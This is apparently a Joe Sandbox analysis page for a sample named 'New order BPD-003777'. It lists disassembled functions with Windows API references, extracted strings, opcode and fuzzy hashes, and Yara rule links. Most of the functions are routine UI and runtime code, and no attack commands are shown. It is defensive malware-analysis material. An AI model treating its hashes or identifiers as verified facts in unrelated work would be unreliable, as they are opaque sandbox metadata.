Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 90e1ec850b5a4f28afa6d9fa1ddf3879dd240f9a2c5a6cf1492e47a82d9e0eb7
Instruction ID: d81d677f1470e77ae9a64632c6a180cca71ce4545428c34b1d5131eda68e09f3
Opcode Fuzzy Hash: 90e1ec850b5a4f28afa6d9fa1ddf3879dd240f9a2c5a6cf1492e47a82d9e0eb7
Instruction Fuzzy Hash: 26417F35A10219AFDB01DFA4D8549EEBBB9FF08344F00806AE946A7361DB30AD55CFA4

Function 00281410 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00281459
OleUninitialize.OLE32(?,00000000), ref: 002814F8
UnregisterHotKey.USER32(?), ref: 002816DD
DestroyWindow.USER32(?), ref: 002C24B9
FreeLibrary.KERNEL32(?), ref: 002C251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 002C254B

Strings

close all, xrefs: 00281454
>., xrefs: 00281542, 00281627

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: >.$close all
API String ID: 469580280-4095040300
Opcode ID: eda38e2af508ded25fedf8f09ec625fbf169b704f04871fb36ad7dadd172ac4a
Instruction ID: 003924f85fbbde26aa26093f2090973846ecf1f46df1580253d63a6b04dc31db
Opcode Fuzzy Hash: eda38e2af508ded25fedf8f09ec625fbf169b704f04871fb36ad7dadd172ac4a
Instruction Fuzzy Hash: CED14835622212CFDB19EF14C995F69F7A8BF05740F6442ADE44AAB291DB30AC36CF50

Function 002F3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 002F33CF

Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002F33F0

Strings

^ ERROR , xrefs: 002F349E
Incorrect parameters to object property !, xrefs: 002F34AB
Error: , xrefs: 002F34D1
"%s" (%d) : ==> %s:, xrefs: 002F3522
Line %d (File "%s"):, xrefs: 002F3443, 002F345C
"%s" (%d) : ==> %s:%s%s, xrefs: 002F3504

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: b3dba73229853f1f1cdaeabbdf5073cb8b4eecb106bbe086ab8512b6f0296d1c
Instruction ID: 8a69119c6096714e40f8f1c30bc64ff6c9145a3488f7aa412bf916e55bb47fa7
Opcode Fuzzy Hash: b3dba73229853f1f1cdaeabbdf5073cb8b4eecb106bbe086ab8512b6f0296d1c
Instruction Fuzzy Hash: 7651917591120AAADF15FBA0CD56EFEB378AF08740F144065F505720A2EB356FA8CF61

Function 002F1187 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,?), ref: 002F125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002F1284
SafeArrayUnaccessData.OLEAUT32(?), ref: 002F12A8
SafeArrayAccessData.OLEAUT32(?,?), ref: 002F12D8
SafeArrayAccessData.OLEAUT32(?,?), ref: 002F135F
SafeArrayAccessData.OLEAUT32(?,00304AFE), ref: 002F13C4
SafeArrayAccessData.OLEAUT32(?,?), ref: 002F1430

Strings

/, xrefs: 002F1474, 002F1408, 002F13A6, 002F133E, 002F1341, 002F13AC, 002F140E, 002F147A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID: /
API String ID: 2550207440-4008681865
Opcode ID: faa7458575c823920b74a09bed0285ef563f42fe3b8c2018749a4fac9bb4a220
Instruction ID: 853660a1157ad037d71c53822fa67cfd69fa4c0fc55fbb719e3e73799a75518a
Opcode Fuzzy Hash: faa7458575c823920b74a09bed0285ef563f42fe3b8c2018749a4fac9bb4a220
Instruction Fuzzy Hash: 5D91EF71A20219DFEB01DF94C884BBEB7B5FF45364F104029EA11EB291DB74A961CF90

Function 00285BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00285C7A

Part of subcall function 00285D0A: GetClientRect.USER32(?,?), ref: 00285D30
Part of subcall function 00285D0A: GetWindowRect.USER32(?,?), ref: 00285D71
Part of subcall function 00285D0A: ScreenToClient.USER32(?,000000FF), ref: 00285D99

GetDC.USER32 ref: 002C46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002C4708
SelectObject.GDI32(00000000,00000000), ref: 002C4716
SelectObject.GDI32(00000000,00000000), ref: 002C472B
ReleaseDC.USER32(?,00000000), ref: 002C4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002C47C4

Strings

U, xrefs: 002C4693

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3c57ecc13102c9bdac901570ce9ced4eda62546a8aea4e754fc031b42525cb31
Instruction ID: abe55a5e0cf58d8f82f0d3c8eee36b7c29076eed84db5da5707771a7686e42c5
Opcode Fuzzy Hash: 3c57ecc13102c9bdac901570ce9ced4eda62546a8aea4e754fc031b42525cb31
Instruction Fuzzy Hash: 6371D034420206DFCF22AF64C994FEA7BB5FF4A314F24436AED555A2A6C3318865DF50

Function 002BAF88 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 002BAFAB

Strings

asin, xrefs: 002BB117
pow, xrefs: 002BB08F, 002BB13B, 002BB14E
sqrt, xrefs: 002BB12F
log10, xrefs: 002BAFF5, 002BB045
exp, xrefs: 002BB070, 002BB0D2
log, xrefs: 002BB051, 002BB05D
acos, xrefs: 002BB123

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: ebf802c800e14fe3de64ccc8ab3079b56aad2ff410ce6a96cc6e1b8ddfda456b
Instruction ID: b1b1d721e6a9e1a5e926b5e9345b4bf18527c907e97caaad8b133bdd01ad334f
Opcode Fuzzy Hash: ebf802c800e14fe3de64ccc8ab3079b56aad2ff410ce6a96cc6e1b8ddfda456b
Instruction Fuzzy Hash: 4E519E7493061ADBCF16DFACE9481FEBBB4FB09340F204185E495A7264CBB689348B15

Function 002E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002C3AAF,?,?,Bad directive syntax error,0031CC08,00000000,00000010,?,?), ref: 002E98BC
LoadStringW.USER32(00000000,?,002C3AAF,?), ref: 002E98C3

Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD

MessageBoxW.USER32(00000000,?,?,00011010), ref: 002E9987

Strings

Line %d:, xrefs: 002E9912
Line %d (File "%s"):, xrefs: 002E992D
., xrefs: 002E996D
Error: , xrefs: 002E9955
%s (%d) : ==> %s.: %s %s, xrefs: 002E98F1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 96e7ae16225bbc992704ab25421b61dc30a72e986a65da6c554668a4b4b70bc1
Instruction ID: 33fc419f8c405cff98a9f349d6d58a1a1fd59b347a2de16cb7aede7d9733ef2f
Opcode Fuzzy Hash: 96e7ae16225bbc992704ab25421b61dc30a72e986a65da6c554668a4b4b70bc1
Instruction Fuzzy Hash: 5F21A03196021AABCF16EF90CC06EEE7779BF19700F04446AF515660A2EB71A6B8CF51

Function 00298BCD Relevance: 13.7, APIs: 9, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00298F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00298BE8,?,00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298FC5

DestroyWindow.USER32(?), ref: 00298C81
KillTimer.USER32(00000000,?,?,?,?,00298BBA,00000000,?), ref: 00298D1B
DestroyAcceleratorTable.USER32(00000000), ref: 002D6973
DeleteObject.GDI32(00000000), ref: 002D69E6

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 104a94a1c39aa1b4c0bba5379d1f558608029af0ce8cb89d58f5d7fee22174f4
Instruction ID: fabaf3d7121b4c04699baefee7d2108ab81cb37ef3620873e341cf87e5d68f23
Opcode Fuzzy Hash: 104a94a1c39aa1b4c0bba5379d1f558608029af0ce8cb89d58f5d7fee22174f4
Instruction Fuzzy Hash: 6C617D31522701DFCF2A9F24D958B6577F5FB46312F18951AE0829BAB0CB71ADA0CF90

Function 003150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00315186
ShowWindow.USER32(?,00000000), ref: 003151C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 003151CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 003151D1

Part of subcall function 00316FBA: DeleteObject.GDI32(?), ref: 00316FE6

GetWindowLongW.USER32(?,000000F0), ref: 0031520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0031521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0031524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00315287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00315296

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 6ae9ea97c6dafd4e29001ff17e05867cb58a61ca70f3da5123eb57f8cef083c6
Instruction ID: 8759f7d7c1d1d6ab0390846f307452ecb28cb74b1b4b8bae28052601290ced41
Opcode Fuzzy Hash: 6ae9ea97c6dafd4e29001ff17e05867cb58a61ca70f3da5123eb57f8cef083c6
Instruction Fuzzy Hash: 0751C431A60A08FEEF2B9F24CC45BD87B69EB8D321F148421F5159A2E0C7B599D1DB40

Function 00298B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002D6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002D68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002D68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002D68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002D68F2
DestroyCursor.USER32(00000000), ref: 002D6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002D691E
DestroyCursor.USER32(00000000), ref: 002D692D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: dd2adbc7b8d8048b837e77dac3847561cf75f2aacf59a97ff342428475238c77
Instruction ID: b56f02d5b089400ed3151ccd3163ab256f8955e5af34f54ef3c80438b084210f
Opcode Fuzzy Hash: dd2adbc7b8d8048b837e77dac3847561cf75f2aacf59a97ff342428475238c77
Instruction Fuzzy Hash: CA518A70620206AFDF21CF25CC65FAA7BB5EB48354F184519F906D72A0DB70EDA0DB50

Function 002EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002EBCFD
IsMenu.USER32(00000000), ref: 002EBD1D
CreatePopupMenu.USER32 ref: 002EBD53
GetMenuItemCount.USER32(010A49D0), ref: 002EBDA4
InsertMenuItemW.USER32(010A49D0,?,00000001,00000030), ref: 002EBDCC

Strings

2, xrefs: 002EBD37
0, xrefs: 002EBCA8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 0317d1fbddd52953c62bdf39a333e391b6e8becd9e48669226fd87ab5e523724
Instruction ID: 5cbf4c86becb38e4d49baba759e3de7a00cbe9c265d193b49458bb5002bff4ab
Opcode Fuzzy Hash: 0317d1fbddd52953c62bdf39a333e391b6e8becd9e48669226fd87ab5e523724
Instruction Fuzzy Hash: 5751D170A6028A9BDF12CFAACC88BEFBBF8BF45314F648159E411D7290D7709960CB51

Function 002A2D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002A2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 002A2D53
_ValidateLocalCookies.LIBCMT ref: 002A2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 002A2E0C
_ValidateLocalCookies.LIBCMT ref: 002A2E61

Strings

&H*, xrefs: 002A2DFE, 002A2E07, 002A2E18
csm, xrefs: 002A2DF6

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H*$csm
API String ID: 1170836740-447412993
Opcode ID: 9c2d763e16d93d1ab3502ab56090f4d4b6342ebbec6c6ab72282674ce6854219
Instruction ID: 9362c3dce3f17dd6c62df48e5490a29c0f11b0ddfa2305fd21af8c834b359719
Opcode Fuzzy Hash: 9c2d763e16d93d1ab3502ab56090f4d4b6342ebbec6c6ab72282674ce6854219
Instruction Fuzzy Hash: 5841A234A20209EBCF10DF6CC845A9EBBB5BF46324F148155E814AB352DF35EA29CF90

Function 002EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002EC913

Strings

blank, xrefs: 002EC895
warning, xrefs: 002EC8FC
stop, xrefs: 002EC8E4
info, xrefs: 002EC8B4
question, xrefs: 002EC8CC

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: e48f21bc7fe7f849bea95f26a3b414c0d9d894e1272f28feea0a8570d09b1a34
Instruction ID: 818a3fa158f573fbaf50e172395684b11ef298478e2f64c68d1c2245d83e7af7
Opcode Fuzzy Hash: e48f21bc7fe7f849bea95f26a3b414c0d9d894e1272f28feea0a8570d09b1a34
Instruction Fuzzy Hash: B011EE316F9347BAA702AF959C83CFE67DCDF16354BB0002AF900A6283DBF4AD115665

Function 0029F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 0029F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 002DF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 002DF454

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ffd7ec91b588cc9696c96961596f06e94238b66c8c0e96b04569e2972257d3c3
Instruction ID: 5d7130851aa6c9268db315650d03c435c9f8b1463ac8e7a5bcb200141cc993be
Opcode Fuzzy Hash: ffd7ec91b588cc9696c96961596f06e94238b66c8c0e96b04569e2972257d3c3
Instruction Fuzzy Hash: 73413D312346C1BEEFF99F29CB8876A7B95AB4A314F14843DE087D6660C67198A0CB10

Function 00312D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00312D1B
GetDC.USER32(00000000), ref: 00312D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00312D2E
ReleaseDC.USER32(00000000,00000000), ref: 00312D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00312D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00312D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,?,002C46DB,?,?,?,?), ref: 00312DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00312DE1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
